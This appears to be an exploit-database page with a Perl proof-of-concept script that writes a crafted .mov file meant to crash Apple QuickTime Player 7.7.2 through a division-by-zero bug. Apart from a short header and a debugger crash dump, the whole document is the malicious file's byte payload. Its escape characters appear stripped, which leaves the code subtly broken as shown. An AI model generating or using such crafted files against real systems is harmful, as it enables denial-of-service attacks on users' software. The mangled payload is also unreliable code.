[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Apple QuickTime Player 7.7.2 Crash PoC
# Published : 2012-10-24
# Author :
# Previous Title : VLC Player <= 2.0.3 ReadAV Crash PoC
# Next Title : Foxit Reader 5.4.3.0920 Crash PoC


#!/usr/bin/perl
#Title     :  Apple QuickTime Player 7.7.2 Division By Zero
#Version   :  7.7.2(1680.56)
#Date      :  2012-10-23
#Vendor    :  http://www.apple.com
#Impact    :  Med/High
#Contact   :  coolkaveh [at] rocketmail.com
#Twitter   :  @coolkaveh
#tested    :  XP SP3 ENG
###############################################################################
#Bug :
#----
#Don't forget that exploitable bugs will be published after being patched
#----
#Division by zero vulnerability during the handling of the (.mov) files.
#That will trigger a denial of service condition
#---- 
################################################################################
#(9fc.dc4): C++ EH exception - code e06d7363 (first chance)
#(9fc.dc4): C++ EH exception - code e06d7363 (first chance)
#(9fc.dc4): Integer divide-by-zero - code c0000094 (first chance)
#First chance exceptions are reported before any exception handling.
#This exception may be expected and handled.
#eax=00000800 
#ebx=06b11490 
#ecx=00000000 
#edx=00000000 
#esi=00000800 
#edi=01069f80
#eip=0534499f 
#esp=0013ba24 
#ebp=00000000 iopl=0         nv up ei ng nz na pe cy
#cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010287
#*** ERROR: Symbol file could not be found.  Defaulted to export symbols for 
#C:Program FilesCommon FilesAppleApple Application SupportCoreAudioToolbox.dll - 
#CoreAudioToolbox!ACQDesignDecoderEntry+0x2114f:
#0534499f f7f9            idiv    eax,ecx
########################################################################################################
my $poc =
"x00x00x07xB5x6Dx6Fx6Fx76x00x00x00x6Cx6Dx76x68x64x00x00x00x00xB6xB6xFEx42xB6".
"xB6xFEx43x00x00x02x58x00x00x0BxB8x00x01x00x00x00xFFx00x00x00x00x00x00x00x00".
"x00x00x00x01x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x01x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x40x00x00x00x00x00x00x00x00x00x00x00x00x00x08x34".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x03x00x00x03xD9x74x72x61x6Bx00".
"x00x00x5Cx74x6Bx68x64x00x00x00x0FxB6xA9x7Ax1BxB6xB6xFEx43x00x00x00x01x00x00".
"x00x00x00x00x0BxB8x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x01x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x01x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x40x00x00x00x00xBEx00x00x00xF0x00x00x00x00x00x18x6Cx6Fx61x64x00".
"x00x00x00x00x00x00x00x00x00x00x01x00x00x01x00x00x00x00x24x65x64x74x73x00x00".
"x00x1Cx65x6Cx73x74x00x00x00x00x00x00x00x01x00x00x0BxB8x00x00x00x00x00x01x00".
"x00x00x00x03x2Dx6Dx64x69x61x00x00x00x20x6Dx64x68x64x00x00x00x00xB6xB6xFEx42".
"xB6xB6xFEx43x00x00x02x58x00x00x0BxB8x00x00x00x00x00x00x00x3Ax68x64x6Cx72x00".
"x00x00x00x6Dx68x6Cx72x76x69x64x65x61x70x70x6Cx00x00x00x00x00x01x01x91x19x41".
"x70x70x6Cx65x20x56x69x64x65x6Fx20x4Dx65x64x69x61x20x48x61x6Ex64x6Cx65x72x00".
"x00x02xCBx6Dx69x6Ex66x00x00x00x14x76x6Dx68x64x00x00x00x01x00x40x80x00x80x00".
"x80x00x00x00x00x39x68x64x6Cx72x00x00x00x00x64x68x6Cx72x61x6Cx69x73x61x70x70".
"x6Cx40x00x00x01x00x01x00x49x18x41x70x70x6Cx65x20x41x6Cx69x61x73x20x44x61x74".
"x61x20x48x61x6Ex64x6Cx65x72x00x00x00x24x64x69x6Ex66x00x00x00x1Cx64x72x65x66".
"x00x00x00x00x00x00x00x01x00x00x00x0Cx61x6Cx69x73x00x00x00x01x00x00x02x52x73".
"x74x62x6Cx00x00x00x66x73x74x73x64x00x00x00x00x00x00x00x01x00x00x00x56x53x56".
"x51x31x00x00x00x00x00x00x00x01x00x02x00x18x53x56x69x73x00x00x03xFFx00x00x02".
"x00x00xBEx00xF0x00x48x00x00x00x48x00x00x00x00x00x00x00x01x0Ex53x6Fx72x65x6E".
"x73x6Fx6Ex20x56x69x64x65x6Fx00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x18xFFxFFx00x00x00x18x73x74x74x73x00x00x00x00x00x00x00x01x00x00x00x3C".
"x00x00x00x32x00x00x00x18x73x74x73x73x00x00x00x00x00x00x00x02x00x00x00x01x00".
"x00x00x02x00x00x00x4Cx73x74x73x63x00x00x00x00x00x00x00x05x00x00x00x01x00x00".
"x00x03x00x00x00x01x00x00x00x11x00x00x00x02x00x00x00x01x00x00x00x12x00x00x00".
"x03x00x00x00x01x00x00x00x13x00x00x00x01x00x00x00x01x00x00x00x14x00x00x00x03".
"x00x00x00x01x00x00x01x04x73x74x73x7Ax00x00x00x00x00x00x00x00x00x00x00x3Cx00".
"x00x01x94x00x00x01xE4x00x00x00x7Cx00x00x00x44x00x00x00x44x00x00x00x60x00x00".
"x00x60x00x00x00x64x00x00x00x6Cx00x00x00x70x00x00x00x88x00x00x00x44x00x00x00".
"x88x00x00x00x58x00x00x00xD0x00x00x01x2Cx00x00x02x10x00x00x02xD0x00x00x03xE4".
"x00x00x04x00x00x00x05xC8x00x00x06xE8x00x00x08x78x00x00x06x40x00x00x0Ax14x00".
"x00x09x68x00x00x0Bx88x00x00x0Ax1Cx00x00x0Cx10x00x00x0Ax20x00x00x10x4Cx00x00".
"x0Ex90x00x00x13x5Cx00x00x0Ex80x00x00x0Fx78x00x00x0Ax54x00x00x0Cx3Cx00x00x02".
"x84x00x00x06x74x00x00x01xF0x00x00x03x28x00x00x00xB4x00x00x00xA4x00x00x00x9C".
"x00x00x00x88x00x00x00x3Cx00x00x00x60x00x00x00x34x00x00x00x6Cx00x00x00x60x00".
"x00x00x40x00x00x00x40x00x00x00x68x00x00x00x54x00x00x00x38x00x00x00x44x00x00".
"x00x60x00x00x00x40x00x00x00x3Cx00x00x00x40x00x00x00x64x73x74x63x6Fx00x00x00".
"x00x00x00x00x15x00x00x17xCBx00x00x1BxBFx00x00x25x53x00x00x26x83x00x00x2ExF9".
"x00x00x30xA9x00x00x3DxEFx00x00x4Bx9Bx00x00x69xE7x00x00x88xEBx00x00xB0x71x00".
"x00xE2xA9x00x01x13xA1x00x01x28xD5x00x01x35xDBx00x01x37xA3x00x01x3Ex3Bx00x01".
"x3Fx07x00x01x3FxEFx00x01x40x43x00x01x41x1Fx00x00x00x0Cx75x64x74x61x00x00x00".
"x00x00x00x02xD7x74x72x61x6Bx00x00x00x5Cx74x6Bx68x64x00x00x00x0FxB6xA9x7Ax1B".
"xB6xB6xFEx43x00x00x00x02x00x00x00x00x00x00x0Bx89x00x00x00x00x00x00x00x00x00".
"x00x00x00x01x00x00x00x00x01x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x01".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x40x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x24x65x64x74x73x00x00x00x1Cx65x6Cx73x74x00x00x00x00x00x00x00x01".
"x00x00x0Bx89x00x00x00x00x00x01x00x00x00x00x02x43x6Dx64x69x61x00x00x00x20x6D".
"x64x68x64x00x00x00x00xB6xB6xFEx42xB6xB6xFEx42x00x00x56x22x00x01xA8x00x00x00".
"x00x00x00x00x00x3Ax68x64x6Cx72x00x00x00x00x6Dx68x6Cx72x73x6Fx75x6Ex61x70x70".
"x6Cx00x00x00x00x00x01x01x92x19x41x70x70x6Cx65x20x53x6Fx75x6Ex64x20x4Dx65x64".
"x69x61x20x48x61x6Ex64x6Cx65x72x00x00x01xE1x6Dx69x6Ex66x00x00x00x10x73x6Dx68".
"x64x00x00x00x00x00x00x00x00x00x00x00x39x68x64x6Cx72x00x00x00x00x64x68x6Cx72".
"x61x6Cx69x73x61x70x70x6Cx40x00x00x01x00x01x00x49x18x41x70x70x6Cx65x20x41x6C".
"x69x61x73x20x44x61x74x61x20x48x61x6Ex64x6Cx65x72x00x00x00x24x64x69x6Ex66x00".
"x00x00x1Cx64x72x65x66x00x00x00x00x00x00x00x01x00x00x00x0Cx61x6Cx69x73x00x00".
"x00x01x00x00x01x6Cx73x74x62x6Cx00x00x00x84x73x74x73x64x00x00x00x00x00x00x00".
"x01x00x00x00x74x51x44x4Dx32x00x00x00x00x00x00x00x01x00x01x00x00x00x00x00x00".
"x00x02x00x10x00x00x00x00x56x22x00x00x00x00x08x00x00x00x00xB9x00x00x01x72x00".
"x00x00x02x00x00x00x40x77x61x76x65x00x00x00x0Cx66x72x6Dx61x51x44x4Dx32x00x00".
"x00x24x51x44x43x41x00x00x00x01x00x00x00x02x00x00x56x22x00x00x7Dx00x00x00x08".
"x00x00x00x00x00x00x00x01x72x00x00x00x08x00x00x00x00x00x00x00x18x73x74x74x73".
"x00x00x00x00x00x00x00x01x00x01xA8x00x00x00x00x01x00x00x00x7Cx73x74x73x63x00".
"x00x00x00x00x00x00x09x00x00x00x01x00x00x30x00x00x00x00x01x00x00x00x02x00x00".
"x28x00x00x00x00x01x00x00x00x03x00x00x30x00x00x00x00x01x00x00x00x04x00x00x28".
"x00x00x00x00x01x00x00x00x06x00x00x30x00x00x00x00x01x00x00x00x07x00x00x28x00".
"x00x00x00x01x00x00x00x08x00x00x30x00x00x00x00x01x00x00x00x09x00x00x28x00x00".
"x00x00x01x00x00x00x0Ax00x00x20x00x00x00x00x01x00x00x00x14x73x74x73x7Ax00x00".
"x00x00x00x00x00x01x00x01xA8x00x00x00x00x38x73x74x63x6Fx00x00x00x00x00x00x00".
"x0Ax00x00x07xE5x00x00x10x91x00x00x1CxA7x00x00x27xBFx00x00x36xB5x00x00x61x3B".
"x00x00xA9x37x00x01x0AxF5x00x01x2ExA1x00x01x38x73x00x00x00x0Cx75x64x74x61x00".
"x00x00x00x00x00x00x91x75x64x74x61x00x00x00x20x4Dx43x50x53x4Dx43x50x52x2Dx66".
"x6Fx72x20x4Dx61x63x69x6Ex74x6Fx73x68x2Dx35x2Ex30x2Ex30x00x00x00x10x70x6Cx61".
"x79x01x00x00x00x0Cx57x4Cx4Fx00x00x00x22xA9x6Ex61x6Dx00x16x00x00x51x75x69x63".
"x6Bx54x69x6Dx65x20x53x61x6Dx70x6Cx65x20x4Dx6Fx76x69x65x00x00x00x27xA9x63x70".
"x79x00x1Bx00x00xA9x20x41x70x70x6Cx65x20x43x6Fx6Dx70x75x74x65x72x2Cx20x49x6E".
"x63x2Ex20x32x30x30x31x00x00x00x0Cx57x4Cx4Fx43x00x32x00x17x00x00x00x00x00x00".
"x00x10x66x72x65x65x00x00x00x00x00x00x00x00x00x00x00x08x77x69x64x65x00x01x3A".
"x0Ex6Dx64x61x74x00x00x00x08x77x69x64x65x00x00x00x00x6Dx64x61x74x82x01x6Fx17".
"x18x09x25xCCx2Fx93xF9x65x32xBFx4CxE6x97xC9xFCx32x99x5Fx26xF3xCBx64x7Ex99xCC".
"x2Fx93xF9x65x32xBFx4CxE6x97xC9xFCx32x99x5Fx26x16x01x16x15x01x55x14x01x55x13".
"x01x20x12x01x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x82x01x6Fx17x18x09x25xCCx2F".
"x93xF9x65x32xBFx4CxE6x97xC9xFCx32x99x5Fx26xF3xCBx64x7Ex99xCCx2Fx93xF9x65x32".
"xBFx4CxE6x97xC9xFCx32x99x5Fx26x16x01x16x15x01x55x14x01x55x13x01x20x12x01x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x82x01x6Fx26xA8x09x25xCCx2Fx93xF9x65x32xBF".
"x4CxE6x97xC9xFCx32x99x5Fx26xF3xCBx64x7Ex99xCCx2Fx93xF9x65x32xBFx4CxE6x97xC9".
"xFCx32x99x5Fx26x16x01x16x15x01x55x14x01x55x13x01x20x12x24xFCx45xCCxEAx46xA1".
"x36x36x3AxB7x2Ex1Ax54x45x5BxD5x48x5Dx35xF2x4Ax45xB4x8AxA8x14xD1x28x46x58x50".
"x23x02xAAx31xE5x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x82x01x6Fx97xF2x09x3Bx31x53x5FxE1xB8xC3x13xF5xE8xD1x41x62".
"xDDxDDxD6xA4xF5xE0x0D".
open(C, ">:raw", "poc.mov");
print C $poc;
close(C);